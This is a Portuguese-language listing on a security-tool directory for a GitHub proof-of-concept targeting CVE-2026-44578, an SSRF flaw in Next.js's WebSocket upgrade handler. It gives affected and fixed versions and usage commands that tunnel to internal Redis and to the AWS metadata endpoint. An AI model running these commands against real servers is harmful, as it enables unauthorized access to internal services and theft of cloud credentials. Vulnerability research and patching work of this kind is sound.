Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-44578-PoC — Prova de conceito de exploração para CVE-2026-44578, uma Falsificação de Solicitação do Lado do Servidor (SSRF) no manipulador de atualização WebSocket do Next.js. Inclui modo de detecção e tunelamento para serviços internos como Redis ou endpoints de metadados da nuvem. | Kitploit
Ferramentas/GitHubGitHub/tocong282/cve-2026-44578-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoSegurança na Nuvem
GitHubtocong282/cve-2026-44578-poc

CVE-2026-44578-PoC

Prova de conceito de exploração para CVE-2026-44578, uma Falsificação de Solicitação do Lado do Servidor (SSRF) no manipulador de atualização WebSocket do Next.js. Inclui modo de detecção e tunelamento para serviços internos como Redis ou endpoints de metadados da nuvem.

Ver Repositório
45há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-44578 - Next.js WebSocket SSRF PoC

Vulnerabilidade: Server-Side Request Forgery no manipulador de atualização WebSocket do Next.js (13.4.13 → 15.5.15, 16.0.0 → 16.1.6)

Uso

# Detect vulnerability
python3 poc.py target.com:3000 --detect

# Tunnel to internal Redis
python3 poc.py target.com:3000 --internal 127.0.0.1:6379 --payload "INFO\r\n"

# Tunnel to AWS metadata
python3 poc.py target.com:3000 --internal 169.254.169.254:80 --payload "GET /latest/meta-data/ HTTP/1.0\r\n\r\n"

Correção

Atualize para Next.js 15.5.16 ou 16.2.5

Referências

  • https://hadrian.io/blog/next-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2
  • GHSA-c4j6-fc7j-m34r
Baixar ferramenta